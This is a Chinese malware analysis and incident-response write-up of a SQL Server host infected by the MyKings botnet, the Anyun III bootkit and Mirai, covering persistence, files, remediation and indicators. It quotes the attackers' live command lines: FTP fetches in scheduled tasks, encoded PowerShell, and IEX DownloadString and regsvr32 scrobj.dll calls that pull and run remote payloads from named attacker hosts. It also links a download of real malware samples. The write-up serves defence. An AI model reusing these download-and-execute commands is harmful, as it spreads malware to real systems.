暗云III v3.0等多个病毒家族结伴来袭实战分析

知识点

MyKings

MyKings是一个大规模多重僵尸网络,并安装门罗币挖矿机,利用服务器资源挖矿。

概述

挖矿攻击名称

MyKings

涉及平台

Windows平台

相关恶意代码家族

DDoS、Proxy、RAT、Mirai

攻击入口

通过扫描开放端口,利用漏洞和弱口令进行入侵

相关漏洞及编号

永恒之蓝

描述简介

MyKings 是一个由多个子僵尸网络构成的多重僵尸网络,2017 年 4 月底以来,该僵尸网络一直积极地扫描互联网上 1433 及其他多个端口,并在渗透进入受害者主机后传播包括 DDoS、Proxy、RAT、Miner 在内的多种不同用途的恶意代码。

1.攻击过程逻辑:

图-攻击过程

图-Payload执行过程

2.病毒各部分功能:

文件名

功能

c.bat

关闭端口

item.dat

远控木马主体DLL

J脚本(硬编码在Payload中)

结束指定进程,删除文件,运行item.dat

cmd批处理脚本(Payload联网获取到内存中)

结束指定进程,删除文件,删除指定账户运行c.bat 、item.dat

表-各部分功能

排查思路

1.攻击者利用SQL Server 弱密码进行暴力入侵方式入侵Windows系统后,会植入木马下载器conhost.exe(原始文件名ups.exe),该程序启动后会首先访问恶意链接http://ok.mymyxmra.ru以获取第二阶段恶意代码的下载地址。

根据C:/Windows/System32/b.txt产生的老的连接状态日志发现有大量外发扫描1433端口判断可能是通过SQL Server弱密码进来的。

C:/Windows/Temp/conhost.exe源始文件名ups.exe:

2.查找异常进程

3.查找异常服务

服务名xWinWpdSrv

映像路径C:/Windows/system/msinfo.exe -s -syn 1000

扫描目标IP地址:生成机制越来越复杂

早期版本中, msinfo.exe用来扫描的目标IP只有两种:从云端配置文件wpd.dat获取、在本地根据外网出口IP随机生成; 最新样本中,增加了一种更复杂的本地随机生成算法,并且会避开一批保留地址段。

核心木马msinfo.exe用到的云端配置文件wpd.dat ,是一个加密的XML文档,其中指定了暴破成功后用到来下载Mirai样本的C2地址、需要扫描的网络服务端口、暴破各个端口所需的口令、入侵各个网络服务时执行的部分命令以及需要扫描的目标IP范围等配置。这些配置都可以根据后继僵尸网络的要求灵活更改。

模块化编程架构的msinfo.exe:主要是其Crack模块中通过继承一个基类TaskCrack,实现其中定义好的一组连接、暴破、执行命令等功能的函数接口即可定义一个TaskCrack_XXX子类,继而实现针对一个新的网络服务的攻击模块Crack模块与wpd.dat配置文件中定义的待扫描网络服务端口相对应,可以灵活更改针对不同网络服务的Crack功能。

其他辅助云端配置文件:msinfo.exe用到的另外一个辅助木马ups.exe ,会涉及其它云端配置文件。这些也都可以灵活配置,方便攻击者控制在下一阶段需要下载什么样本、执行什么样的命令。

4.查找异常计划任务

| 名称 | 启动程序 | 触发器 | | --- | --- | --- | | my1 | c:/windows/system/my1.bat | 每天12点执行 | | Mysa | cmd.exe >/c echo open ftp.ftp0930.host>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye | 系统启动执行 | | Mysa1 | rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa | 系统启动执行 | | Mysa2 | cmd.exe /c echo open ftp.ftp0930.host>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p | 系统启动执行 | | ok | rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa | 系统启动执行 |

加载远控木马:

5.查找异常启动项

6.查找异常防火墙和本地安全策略

木马文件配置防火墙策略,关闭135、137、138、139、445端口,防止再被其他病毒感染。

7.查找异常目录&文件

C:/Windows/debug目录,门罗币挖矿相关的模块和配置文件:

门罗币配置config.json

矿池url:"pool.minexmr.com:5555"

钱包地址:

4862mTLmCo9LGqn3XUrV9xaEfzgNPid7AM26XpeWWm4nfEtPfV9Eb1k2xYaYWRyM6LYETJkF3RCqF5JX5dQWEi3hNNE36C6

pass:"x"

C:/Windows/Help目录:

C:/Windows/system目录。

msinfo.exe病毒母体通过注册服务&写入恶意代码到数据库的手段,实现持久化攻击,会连接云端,自动更新病毒,实时下载最新的攻击模块。

C:/Windows/system32系统命令目录。

b.txt 端口连接状态;

a.exe主要功能是实现清除可疑木马进程和启动DiskWriter远控木马item.dat;

csrse.exe原始文件ups.exe:

C:/Windows/Temp临时文件目录,被注入的病毒代码执行恶意逻辑主要参照从C&C服务器请求到的配置文件,该文件释放到本地后路径为:%SystemRoot%\Temp\ntuser.dat。该文件被异或0x95加密过,在使用该文件时会对文件进行解密。

解密后的ntuser.dat配置内容,如下图所示:

ntuser.dat配置内容总体分为两个部分:main和update。main部分中的所有ip和网址用来下载后门病毒相关配置,update部分中的ip和网址用来更新ntuser.dat配置数据,请求到的相关配置信息至今依然在持续更新。下载后门病毒配置信息cloud.txt的代码逻辑。

下载后门病毒配置信息

请求到的配置信息中,除后门病毒下载地址(exe键名对应数据)外,还有名为url的配置项,该功能开启后会hook CreateProcessW劫持浏览器启动参数,但现阶段该功能尚未被开启。配置信息,如下图所示:

配置信息

恶意代码会通过上图中的下载地址,将后门病毒下载到%SystemRoot%\Temp\conhost.exe目录进行执行。下载执行远程后门病毒相关逻辑。

下载执行后门病毒

Backdoor/Voluminer

该病毒运行后,首先会释放存放有C&C服务器列表的文件(xp.dat)至C:\Program Files\Common Files目录中,之后向C&C服务器列表中的服务器地址请求xpxmr.dat文件,用于更新C&C服务器列表。请求到的xpxmr.dat文件数据使用RSA算法进行过加密,进行解密后会重新写入到xpxmr.dat文件中,该文件为明文存放。

更新C&C服务器列表

病毒在运行中会向C&C服务器请求获取最新病毒版本号,当检测到存在新版本时,则会通过C&C服务器下载执行最新版本的病毒程序。当后门病毒发现当前系统为64位系统时,还会向C&C服务器请求64位版本的后门病毒到本地进行执行。

请求64位版本病毒

随后,病毒会使用地址列表中的C&C服务器地址下载挖矿所需的病毒组件,暂时我们发现会被病毒下载至本地病毒仅具有挖矿功能,但我们不排除其将来会下载其他病毒模块的可能性。病毒在下载文件后,会对病毒组件进行md5校验,病毒组件的md5值会参考C&C服务器中的md5.txt文件内容。

在该目录下有个以本机ip命名的txt文件

内容如下 :

--------------------------------------------------------         路径:C:\Windows\Temp\conhost.exe命令行:C:\Windows\Temp\conhost.exe                      路径:C:\Windows\SysWOW64\cmd.exe命令行:cmd /c ""C:\windows\web\c3.bat" "路径:C:\Windows\SysWOW64\cacls.exe命令行:cacls  c:\windows\temp\docv8.exe/e /d system路径:C:\Windows\system32\csrse.exe命令行:"C:\Windows\system32\csrse.exe" 路径:c:\windows\system\msinfo.exe命令行:c:\windows\system\msinfo.exe -s -syn 1000路径:c:\windows\debug\lsmo.exe命令行:c:\windows\debug\lsmo.exe 路径:C:\Windows\System32\cmd.exe命令行:"C:\Windows\System32\cmd.exe" /C ping 127.0.0.1 -n 6 & taskkill -f /im lsmose.exe & c:\windows\debug\lsmose.exe路径:c:\windows\debug\lsmose.exe命令行:c:\windows\debug\lsmose.exe路径:C:\Windows\system32\cmd.exe命令行:cmd /c powershell.exe -nop -enc JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAA6ADgAOAA4ADgALwAyAC4AdAB4AHQAIgApAC4AdAByAGkAbQAoACkAIAAtAHMAcABsAGkAdAAgACIAWwBcAHIAXABuAF0AKwAiAHwAJQB7ACQAbgA9ACQAXwAuAHMAcABsAGkAdAAoACIALwAiACkAWwAtADEAXQA7ACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAF8ALAAgACQAbgApADsAcwB0AGEAcgB0ACAAJABuADsAfQA=&powershell.exe    IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1217bye.host:8888/S.ps1')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://173.208.139.170/s.txt')&powershell.exe    IEX (New-Object system.Net.WebClient).DownloadString('http://35.182.171.137/s.jpg')||regsvr32 /u /s /i:http://wmi.1217bye.host:8888/1.txt scrobj.dll&regsvr32    /u /s /i:http://173.208.139.170/2.txt scrobj.dll&regsvr32 /u /s /i:http://35.182.171.137/3.txt scrobj.dll路径:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe命令行:powershell.exe  IEX (New-Object system.Net.WebClient).DownloadString('http://173.208.139.170/s.txt')-------------------------------------------- 

备注

加载远控木马,64base编码解码后得到:

$ w c = N e w - O b j e c t   S y s t e m . N e t . W e b C l i e n t ; $ w c . D o w n l o a d S t r i n g ( " h t t p : / / w m i . 1 2 1 7 b y e . h o s t : 8 8 8 8 / 2 . t x t " ) . t r i m ( )   - s p l i t   " [ \ r    \ n ] + " | % { $ n = $ _ . s p l i t ( " / " ) [ - 1 ] ; $ w c . D o w n l o a d F i l e ( $ _ ,   $ n ) ; s t a r t   $ n ; }  

利用regsvr32执行远程脚本命令 /u /s /i: http://wmi.1217bye.host:8888/1.txt scrobj.dll 该txt文件为一个远程js脚本,js脚本里的字符都被用16进制进行替换,解密后的js脚本,其主要功能是下载木马文件并执行。

解密后的远程脚本,Upsnew2释放远控木马item.dat以及c3.bat脚本。

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DV6W313X   

ie临时文件目录下upsnew2[1].exe,原始文件名ups.exe:

txt最下面是用mimikatz获得的系统明文密码:

下载Invoke-Mimikatz.ps1脚本:

要结束的进程列表:

C:/Windows/Web目录:

c3.bat脚本功能如下:

C:\Program Files\Common Files目录下:

C:/Program Files/目录下:

C:/Windows/SysWOW64目录下,wpd.dat扫描的目标IP从云端配置文件:

C:/Windows/taidbox/mbrbackup.bin,暗云III v3.0:

暗云III v3.0其线程回调例程执行流程如下:

a)调用RtlInitUnicodeString初始化csrss.exe;

b)查找进程csrss.exe,检测到csrss.exe后则继续下一步;

c)感染MBR,并保护1到62扇区的数据,如果试图读前62扇区的数据则会返回正常的数据,如果试图写前62扇区的数据则返回写入的数据进行欺骗,实际没有被写入;

d)调用CreateSystemThread创建系统线程,该线程函数主要完成了shellcode下载执行等功能,可拉取任意功能恶意代码进行执行。

解决方案

1.隔离感染主机:已中毒计算机尽快隔离,关闭所有网络连接,禁用网卡;

2.切断传播途径:从僵尸网络当前的攻击重点来看,防范其通过1433端口入侵计算机是非常有必要的。此外,Bot程序还有多种攻击方式尚未使用,这些攻击方式可能在未来的某一天被开启,因此也需要防范可能发生的攻击;

3.查找攻击源:加固SQL Server服务器,修补服务器安全漏洞。使用安全的密码策略,使用高强度密码,切勿使用弱口令,防止黑客暴力破解,禁用sa账号;

4.查杀病毒:使用管家急救箱进行查杀,下载网址:

http://dlied6.qq.com/invc/xfspeed/qqpcmgr/other/SystemAidBoxPro.zip ;

5.修补漏洞:特别注意445端口的开放情况,如果不需要使用Windows局域网共享服务,可以通过设置防火墙规则来关闭445等端口,并及时打上永恒之蓝MS17-010等漏洞相关补丁;

6.注意MSSQL,RDP,Telnet等服务的弱口令问题;

7.注意系统账户情况,禁用不必要的账户。

参考

1.具备多病毒功能!MiraiXMiner物联网僵尸网络攻击来袭

https://www.freebuf.com/articles/terminal/191303.html

2.恶意挖矿攻击的现状、检测及处置

https://www.freebuf.com/articles/system/189454.html

3.MyKings:一个大规模多重僵尸网络

https://www.freebuf.com/articles/network/161286.html

4.【木马分析】悄然崛起的挖矿机僵尸网络:打服务器挖价值百万门罗币

https://www.anquanke.com/post/id/86751

5.MyKings僵尸网络最新变种突袭,攻击代码多次加密混淆,难以检测

https://mp.weixin.qq.com/s/GJ4ilPNpe7NPevw4MHP0iw

6.弱口令爆破SQL Server服务器 暗云、Mykings、Mirai多个病毒家族结伴来袭

https://www.freebuf.com/column/193260.html

7.暗云系列Bootkit木马最新动态

https://www.freebuf.com/column/187489.html

8.MyKing黑产团伙最新挖矿活动曝光

https://x.threatbook.cn/nodev4/vb4/article?threatInfoID=936

9.中国黑客利用“永恒之蓝”搜刮肉鸡构建僵尸网络

www.sohu.com/a/144223631_765820

10.僵尸网络“Mykings”

www.voidcn.com/article/p-xdbozctv-brp.html

11.“隐匿者”病毒团伙技术升级传播病毒 暴力入侵电脑威胁全网用户

https://www.secpulse.com/archives/75273.html

12.彻底曝光黑客组织“隐匿者”:目前作恶最多的网络攻击团伙

www.4hou.com/info/news/6838.html

13.代码战争的主阵地——来自终端的威胁情报详述.pdf

www.studylead.com/p-7400580.html

14.【木马分析】分析利用“永恒之蓝”漏洞传播的RAT

https://www.anquanke.com/post/id/86822

域名

127.0.0.1  ftp.ftp0930.host127.0.0.1  pool.minexmr.com127.0.0.1  raw.githubusercontent.com127.0.0.1  wmi.1217bye.host127.0.0.1  down.mysking.info127.0.0.1  js.ftp0930.host127.0.0.1  js.mykings.top127.0.0.1  ftp.ftp0118.info127.0.0.1  ok.mymyxmra.ru    127.0.0.1  mbr.kill0604.ru

ip

173.208.139.17035.182.171.137    45.58.135.106    103.213.246.2378.142.29.15274.222.14.6118.218.14.96223.25.247.240223.25.247.152103.95.28.5423.88.160.137    81.177.135.35    78.142.29.110    174.128.239.250    66.117.6.174

暗云III v3.0 、Mykings、Mirai木马样本已放到网盘供学习。

链接:https://pan.baidu.com/s/14Hqb3IrjvAqykJSsgKk5Rw

提取码:3uoq

*本文作者:xuchen16,转载请注明来自FreeBuf.COM

原文发布于微信公众号 - FreeBuf(freebuf)

原文发表时间:2019-02-10

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

扫码关注云+社区

领取腾讯云代金券